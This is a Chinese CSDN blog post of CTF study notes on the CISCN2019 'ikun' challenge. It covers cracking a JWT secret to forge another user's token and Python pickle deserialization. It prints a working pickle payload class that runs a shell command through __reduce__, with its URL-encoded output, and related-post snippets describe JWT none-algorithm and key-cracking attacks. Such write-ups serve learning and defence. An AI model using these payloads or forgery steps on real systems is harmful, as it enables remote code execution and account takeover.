JWT解密和python反序列化之[CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2024-05-11 16:59:01 发布
最新推荐文章于 2024-05-11 16:59:01 发布
阅读量473 收藏
点赞数
分类专栏: CTF知识点 文章标签: 前端 servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/126580913
版权

知识点:

JWT

和cookie一个类型,用于认证身份,将jwt值放在JSON Web Tokens - jwt.io解密,可以得到结果,但是想要伪造其他的用户的话需要密钥,密钥使用c-jwt-cracker 中的 ./jwtcrack 进行破解;

破解得到密钥之后在网址中填入得到伪造的jwt;burp更改就可以了;

python 反序列化:

Pickle是Python内的一个标准模块,实现了基本的数据序列化和反序列化

pickle.dumps 序列化

pickle.laods 反序列化

dumps将obj对象序列化并返回一个bytes对象
loads将bytes反序列化并返回一个对象

 参考[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化_sGanYu的博客-CSDN博客

import pickle
import urllib
import commands
 
class payload(object):
    def __reduce__(self):
        return (commands.getoutput,('ls /',))  # return无返回值,使用commands.getoutput(cmd) -> string只返回执行的结果, 忽略返回值
 
a = payload()
print(urllib.quote(pickle.dumps(a)))
 
#  ccommands%0Agetoutput%0Ap0%0A%28S%27ls%20/%27%0Ap1%0Atp2%0ARp3%0A.

一只Traveler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JWT+python反序列化漏洞 [CISCN2019 华北赛区 Day1 Web2]ikun
weixin_45782091的博客
03-22 5191
前面的步骤不是很重要 (主要是这个题太魔性) 主要是一个去找lv6所在页面 import requests url = "http://b9ac92ba-7b09-4b78-9ed8-540734732bff.node4.buuoj.cn:81/shop?page=" i=1 while True: r = requests.get(url + str(i)) if 'lv6.png' in r.text: print (i) break i=i+1
一道CTF题看JWTpython反序列化
weixin_44377940的博客
06-20 1622
目录题目题解知识点JWTPython 序列化与反序列化 题目 题为[CISCN2019 华北赛区 Day1 Web2]ikun 题解 打开,看到这里 看来要找到lv6,写个小脚本: #[CISCN2019 华北赛区 Day1 Web2]ikun,找lv6 import requests url = "http://9592eed0-512a-4494-bedb-332fdf504447.node3.buuoj.cn/shop?page=" for i in range(0,2000): r=requ
Python 生成 JWT(json web token) 及 解析方式_python jwt token解析
最新发布
2401_84140580的博客
05-11 1142
jwt_token = jwt.encode(token_dict, # payload, 有效载体“zhananbudanchou9527269”, # 进行加密签名的密钥algorithm=“HS256”, # 指明签名算法方式, 默认也是HS256headers=headers # json web token 数据结构包含两部分, payload(有效载体), headers(标头)
Pythonjwt解码
诗与浪子的博客
10-07 1711
【代码】jwt解码。
[CISCN2019 华北赛区 Day1 Web2]ikun (JWT更改与python反序列化)
EC_Carrot的博客
12-23 622
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 提示是要买到Iv6,有很多页面,需要写脚本来找 import requests url="http://5d13c449-296b-4491-9240-52ac885c1bc3.node3.buuoj.cn/shop?page=" for i in range(0,400): r=requests.get(url+str(i)) if '
第38天:WEB漏洞-反序列化之PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-反序列化之PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的反序列化漏洞。反序列化漏洞是由于程序在处理序列化数据时没有充分验证输入,从而允许攻击者构造...
11.Oauth2授权之JWT集成
01-01
Oauth2授权之JWT集成 在本文中,我们将详细介绍Oauth2授权中使用JSON Web Token(JWT)的集成。JWT是一种基于RFC 7519标准定义的可以安全传输的JSON对象,由于使用了数字签名,所以是可信任和安全的。 JWT的组成 -...
python-jwt:适用于Python的JSON Web令牌库
05-10
python-jwt是由开发的Python中的JSON Web令牌(JWT)实现。 例子 import json from datetime import datetime , timedelta , timezone from jwt import ( JWT , jwk_from_dict , jwk_from_pem , ) from jwt . ...
netcore+webapi+jwt+oauth2+swagger的例子
05-06
2.WebApiTest:.NetCore+jwt+swagger编写的接口 3.WebApiTest.ApiOauth2:.Net4.5+oauth2+swagger编写的接口 4.WebApiTest.ApiController:.Net4.5+jwt+swagger编写的接口 5.WebApiTest.MVC:在mvc中使用webapi(Web...
.NET6平台开发WebApi-使用JWT进行用户鉴权和测试源码
02-21
1.用.Net6平台WebApi项目开发 2.使用jwt给用户颁发密钥 3.swagger验证配置 4.接口jwt验证密钥方法 5.运行就能使用
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
sGanYu
05-22 1232
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤 先去注册一个账户 注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了 这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
Python:使用PyJWT实现JSON Web Tokens加密解密
彭世瑜的博客
07-26 4967
科普 JSON Web Token 入门教程 Json Web Token JWT三部分组成: (1)Header (2)Payload (3)Signature Base64URL 算法: Base64 有三个字符+、/和=,在 URL 里面有特殊含义, 所以要被替换掉:=被省略、+替换成-,/替换成_ 代码实现 github:https://github.com/jpadilla/pyjwt/...
使用Python生成和解码JWTToken
03-01 4786
一种用以产生访问令牌(token)的开源标准;是目前Token鉴权机制下最流行的方案。PyJWT是一个Python库,官方文档, 安装如下:pip install pyjwt JWT编码:先上一张官方的图 举个例子: def encode_token(): payload = { 'exp': datetime.now() + timedelta(minutes=30), # 令牌过期时间 'username': 'BigFish' # 想要传递的信息,如用户名..
jwt解密
神zhi殇的博客
11-02 6420
文章目录认识JWT什么是JWTJWT的原理HeaderPayloadSignatureJWT解码 认识JWT 什么是JWTJWT全称是JSON Web Token是一个开放标准(RFC 7519),目前最流行的跨域身份验证解决方案。 它定义了一种经过加密的格式,放在json对象在请求中传递,用于验证请求是否被允许访问。 JWT的原理 服务器经过认证以后,会生成加密串返回前台,结构如下图: JSON Web Token由三部分组成,它们之间用.连接。 * Header 头部 * Payload
ctfshow 347 jwt暴力破解密
c1516175954的博客
09-20 454
jwtool.py爆破,得到key:123456。
JWT介绍&空加密&暴破密钥&私钥泄露&密钥混淆&黑盒_jwt泄露
2301_82243558的博客
04-09 960
这里考虑两种思路:1、爆破密钥,显然难度较大;2、尝试将加密算法置空,也就是 alg=none同样,将 JWT 值发到 Decoder 模块,先 Base64 解码,将 HS256 替换为 none,user 替换为 admin 后,再 Base64 编码。但需要注意的是,使用此方法要先将 Signature 部分删除掉,因为加密算法为 none 必须将签名置空,并且需要将 Header 和 Claims 分别处理后再用 . 号连接,因为实测直接一起处理是不行的。最终的格式为:Header.Claims.(
JWT介绍&空加密&暴破密钥&私钥泄露&密钥混淆&黑盒
qq_46081990的博客
12-21 2850
本文介绍了什么是 JWT,并将基于 Token 的验证方式与 Cookie+Session 的验证方式对比,介绍了 JWT 三个组成部分(Header、Claims、Signature)及 JWT 流量特征(eyJ)。 着重讲解了 JWT 的漏洞利用方式(空加密算法、爆破密钥、私钥泄露、密钥混淆),最后总结了黑盒下 JWT 漏洞的测试思路。
2021-7-30 [CISCN2019 华北赛区 Day1 Web2]ikun 知识点:逻辑漏洞,JWT伪造,python-pickle反序列化
m0_51326092的博客
08-03 599
文章目录前言前置知识一、JWT二、Python-pickle反序列化解题过程总结 前言 一开始看到kunkun,好家伙,做着做着发现这真是道难题,好你个姬霓太美,太菜了不得不去看大佬wp,才发现是我从未体验过得全新知识点,针不搓呢!!! 前置知识 参考大佬博客: https://www.cnblogs.com/Cl0ud/p/12177062.html 一、JWT JWT解码网站 Json Web Token详解 JWT破解工具 二、Python-pickle反序列化 解题过程 总结 ...
jwt python 编码 解码
weixin_39684041的博客
01-17 3792
代码示例 import jwt # jwt密钥 JWT_SECRET = '04147af1e42c20c3b50bdc111774346e' # 编码 def encode(payload): return jwt.encode(payload, JWT_SECRET, algorithm='HS256') # 解码 def decode(string): return jwt.decode(string, JWT_SECRET, algorithms=['HS256']) # j
是否有安全的序列化和反序列化方法类
04-13
当涉及到序列化和反序列化时,确保安全性是非常重要的。以下是一些常用的安全序列化和反序列化方法类: 1. JSON Web Tokens (JWT):JWT是一种基于JSON的开放标准,用于在各方之间安全地传输信息。它可以用于序列化和反序列化数据,并提供了签名和加密机制来确保数据的完整性和安全性。 2. SecureXMLSerializer:这是一个安全的XML序列化器,用于将对象序列化为XML格式。它提供了对敏感数据的加密和签名功能,以确保数据的安全性。 3. MessagePack:MessagePack是一种高效的二进制序列化格式,可以将对象序列化为紧凑的字节流。它支持加密和签名功能,以确保数据的安全传输和存储。 4. Protocol Buffers:Protocol Buffers是一种跨平台、语言无关的序列化框架,可以将结构化数据序列化为紧凑的二进制格式。它支持数据的加密和签名,以确保数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值